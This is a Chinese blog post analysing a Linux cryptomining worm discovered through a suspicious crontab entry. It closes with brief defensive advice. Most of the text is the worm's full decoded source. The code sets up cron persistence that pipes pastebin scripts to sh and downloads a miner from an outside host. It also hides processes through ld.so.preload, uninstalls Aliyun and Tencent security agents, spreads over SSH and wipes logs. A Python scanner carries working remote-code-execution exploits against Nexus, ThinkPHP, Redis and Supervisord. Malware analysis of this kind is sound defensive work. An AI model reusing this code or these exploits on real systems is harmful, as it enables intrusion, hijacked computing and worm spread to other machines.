病毒样本

博客围绕crontab可疑行展开,查看qbbSdzZd文件,对代码e函数进行解码。指出病毒代码丑陋但暴力高效,列出可能出现漏洞的软件如Nenux、Thinkphp等。还提醒若感染病毒,检查局域网其他机器,同时可从病毒学习知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

crontab可疑行

# crontab脚本,删掉后会自动重写
*/23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh
  • 查看其中的qbbSdzZd文件
> wget https://pastebin.com/raw/qbbSdzZd && cat qbbSdzZd
# 得到
(curl -fsSL https://pastebin.com/raw/T8zYizW2 || wget -q -O- https://pastebin.com/raw/T8zYizW2)|base64 -d |/bin/bash

# 得到病毒的代码,这里的病毒代码可能会改变
> wget https://pastebin.com/raw/T8zYizW2 | base64 -d
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function b() {
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
p=$(ps auxf|grep -v grep|grep sysinfo|wc -l)
if [ ${p} -eq 0 ];then
	ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
}

function d() {
	ARCH=$(uname -i)
	if [ "$ARCH" == "x86_64" ]; then
	    mkdir -p /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
		chmod 1777 /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
		(curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \
		|| wget http://alonecode.ml/linux/sysinfo -O /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
		&& chmod +x /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
		
		nohup /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
	else
		mkdir -p /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
		chmod 1777 /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy
		(curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \
		|| wget http://alonecode.ml/linux/sysinfo -O /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \
		&& chmod +x /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo
		
		nohup /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 &
	fi
}

function e() {
	nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
	touch /tmp/.38t9guft0055d0565u444gtjr0
}

function c() {
	chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
	(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/cBjiacdv -o /usr/local/bin/dns \
	|| wget https://pastebin.com/raw/cBjiacdv -O /usr/local/bin/dns) \
	&& chmod 755 /usr/local/bin/dns \
	&& touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
	
	echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab
	echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
	echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
	echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
	mkdir -p /etc/cron.hourly
	(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.hourly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
	mkdir -p /etc/cron.daily
	(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.daily/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
	mkdir -p /etc/cron.monthly
	(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.monthly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner
	mkdir -p /usr/local/lib/
	if [ ! -f "/usr/local/lib/libdns.so" ]; then
		curl -fsSL --connect-timeout 120 http://alonecode.ml/libprocesshider.so -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so && touch -acmr /bin/sh /usr/local/lib/libdns.so && chattr +i /usr/local/lib/libdns.so
	        if [ ! -f "/usr/local/lib/libdns.so" ]; then
	            wget http://alonecode.ml/libprocesshider.so -O /usr/local/lib/libdns.so \
	            && chmod 755 /usr/local/lib/libdns.so \
	            && touch -acmr /bin/sh /usr/local/lib/libdns.so \
	            && chattr +i /usr/local/lib/libdns.so
	        fi
	fi
	echo /usr/local/lib/libdns.so > /etc/ld.so.preload
	touch -acmr /bin/sh /etc/ld.so.preload
	touch -acmr /bin/sh /usr/local/lib/libdns.so
	chattr -i /etc/ld.so.preload && echo /usr/local/lib/libdns.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload
	if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
		# 两个分号的地方应该只有一个,多的一个是我加的,为了语法高亮。这里是到know_hosts的机器里面找免密登陆的机器,下载并运行病毒
  		for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"" /root/.ssh/known_hosts); do 
  			ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \
  			'(curl -fsSL https://pastebin.com/raw/qbbSdzZd || wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh' & 
  		done
	fi
	touch -acmr /bin/sh /etc/cron.hourly/oanacroner
	touch -acmr /bin/sh /etc/cron.daily/oanacroner
	touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}

function a() {      #卸载安全程序
	if ps aux | grep -i '[a]liyun'; then
		wget http://update.aegis.aliyun.com/download/uninstall.sh
		chmod +x uninstall.sh
		./uninstall.sh
		wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
		chmod +x quartz_uninstall.sh
		./quartz_uninstall.sh
		rm -f uninstall.sh 	quartz_uninstall.sh
		pkill aliyun-service
		rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
		rm -rf /usr/local/aegis*;
	elif ps aux | grep -i '[y]unjing'; then
		/usr/local/qcloud/stargate/admin/uninstall.sh
		/usr/local/qcloud/YunJing/uninst.sh
		/usr/local/qcloud/monitor/barad/admin/uninstall.sh
	fi
	touch /tmp/.a
}

mkdir -p /tmp
chmod 1777 /tmp
if [ ! -f "/tmp/.a" ]; then
	a
fi
b
c
port=$(netstat -an | grep :3333 | wc -l)
if [ ${port} -eq 0 ];then
	d
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then
	e
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#%

将上述代码的e函数拿出来

python -c import base64;

exec(
	base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz')
)

解码

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/xTWpy2g1'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass

再解码

# -*- coding: utf-8 -*-
import requests
import threading
import time
import socket
from xmlrpclib import ServerProxy
from re import findall
import os
import json
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# import redis
from bs4 import BeautifulSoup

Number = 0
ThreadNumberGo = 0
Victor = 0
a3 = 0
a4 = 0
A = 0
NexusLDNumber = 0
NexusVNumber = 0
ThinkphpLDNumber = 0
ThinkphpVNumber = 0
RedisLDNumber = 0
RedisVNumber = 0
SupervisordLDNumber = 0
SupervisordVNumber = 0

class Thread (threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        global a3
        IP_list(a3)

def IP_list(a3):
    global ThreadNumberGo
    global ip
    ThreadNumberGo += 1
    ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
    ips2 = findall(r'\d+.\d+.', ip2)[0]

    for i in range(0, 255):
        ip_list2 = (ips2 + (str(i)))
        for g in range(1, 255):
            ip = ip_list2 + '.' + (str(g))

        try:
            Nexus(ip)
        except:
            try:
                Thinkphp(ip)
            except:
                try:
                    Redis(ip)
                except:
                    try:
                        Supervisord(ip,"9000")
                    except:
                        try:
                            Supervisord(ip,"9001")
                        except:
                            try:
                                Supervisord(ip,"9002")
                            except:
                                try:
                                    Supervisord(ip,"9003")
                                except:
                                    try:
                                        Supervisord(ip,"8090")
                                    except:
                                        try:
                                            Supervisord(ip,"7001")
                                        except:
                                            try:
                                                Supervisord(ip,"9999")
                                            except:
                                                try:
                                                    Supervisord(ip,"80")
                                                except:
                                                    try:
                                                        Supervisord(ip,"9100")
                                                    except:
                                                        pass

    ThreadNumberGo -= 1

def Nexus(IP):
    url = "http://{0}:8081/".format(IP)
    html = requests.get(url,timeout=5)
    html = html.text
    if html.find("Nexus Repository Manager") > 0:
        if html.find("/static/rapture/resources/favicon.ico?_v=") > 0:
            if int(html[html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."):html.find(".",html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."))]) < 15:

                def Attack(ip,port,Command):
                    AccUrl = "http://{0}:{1}".format(ip,port) + "/service/extdirect"
                    data = {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
                        [{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('{0}')".format(Command)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}

                    headers = {
                        "Host":"{0}:{1}".format(ip,port),
                        "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101",
                        "Accept":"*/*",
                        "Content-Type":"application/json",
                        "X-Requested-With":"XMLHttpRequest",
                        "Content-Length":"368",
                        "Connection":"close"
                    }
                    requests.post(AccUrl,data=json.dumps(data),headers=headers,timeout=10)

                Attack(IP,"8081","curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650")
                time.sleep(5)
                Attack(IP,"8081","chmod +x /tmp/sh-thd-1555254163650")
                time.sleep(3)
                Attack(IP,"8081","/bin/bash /tmp/sh-thd-1555254163650")

def Thinkphp(IP):
    global ip
    try:
        url = "http://{0}".format(IP)
        response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
    except:
        try:
            url = "http://{0}".format(IP)
            response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
        except:
            try:
                url = "https://{0}".format(IP)
                response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)
            except:
                url = "https://{0}".format(IP)
                response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5)

    soup = BeautifulSoup(response.text,"lxml")

    if 'PHP Version' in str(soup.text):
        def Attack(Url,Command):
            url = Url
            try:
                requests.get(url=url + r"/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5)
            except:
                try:
                    requests.get(url=url + r"/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5)
                except:
                    pass
        try:
            Attack(url,"(curl -fsSL https://pastebin.com/raw/b5p2r6DQ||wget -q -O- https://pastebin.com/raw/b5p2r6DQ)|bash")
        except:
            pass

class Redis():
    def __init__(self,host):
        self.host = host
        
    def run(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((self.host, 6379))
        s.send("info\r\n")
        if s.recv(1) == '$':
            s.send('config set dir /var/spool/cron\r\n')
            time.sleep(1)
            s.send('config set dbfilename root\r\n')
            time.sleep(1)
            s.send('set ACbackup "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/b5p2r6DQ|bash\\n\\n\\n"\r\n')
            time.sleep(1)
            s.send('save\r\n')
        s.close()

def Supervisord(IP,Port):
    def AttackPOC(IP,Port):
        target = "http://{0}:{1}/RPC2".format(IP,Port)
        socket.setdefaulttimeout(25)
        try:
            server = ServerProxy(target)
            server.supervisor.supervisord.options.warnings.linecache.os.system('curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650')
            time.sleep(1)
            server.supervisor.supervisord.options.warnings.linecache.os.system('wget https://pastebin.com/raw/b5p2r6DQ -O /tmp/sh-thd-1555254163650')
            time.sleep(1)
            server.supervisor.supervisord.options.warnings.linecache.os.system('chmod +x /tmp/sh-thd-1555254163650')
            time.sleep(1)
            server.supervisor.supervisord.options.warnings.linecache.os.system('/bin/bash /tmp/sh-thd-1555254163650')
        except:
            pass
    AttackPOC(IP,Port)

thread = locals()
ThreadNumber = os.popen("grep 'processor' /proc/cpuinfo | sort -u | wc -l")
ThreadNumber = ThreadNumber.read()

K = 0
LThreadNumber = 0

while LThreadNumber < 255:
    if a3 < 255:
        if ThreadNumberGo < int(ThreadNumber):
            LThreadNumber += 1
            for ZS in range(LThreadNumber,LThreadNumber+1):
                thread[str(K)] = Thread()
                (thread[str(K)]).start()
                a3 += 1
                K += 1
    else:
        if open("/tmp/.38t9guft0055d0565u444gtjr0"):
            os.remove("/tmp/.38t9guft0055d0565u444gtjr0")
        break

思考

  1. 可以看出来病毒的代码非常的丑陋,但是也非常暴力和高效
  2. 可能出现漏洞的软件:Nenux, Thinkphp, redis, supervisord。所以要检查这些软件是不是没有设置密码什么的
  3. 如果已经感染病毒,查看局域网的其他机器是否都免密了,是否也感染了病毒
  4. 可以从病毒上面学习一些知识
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值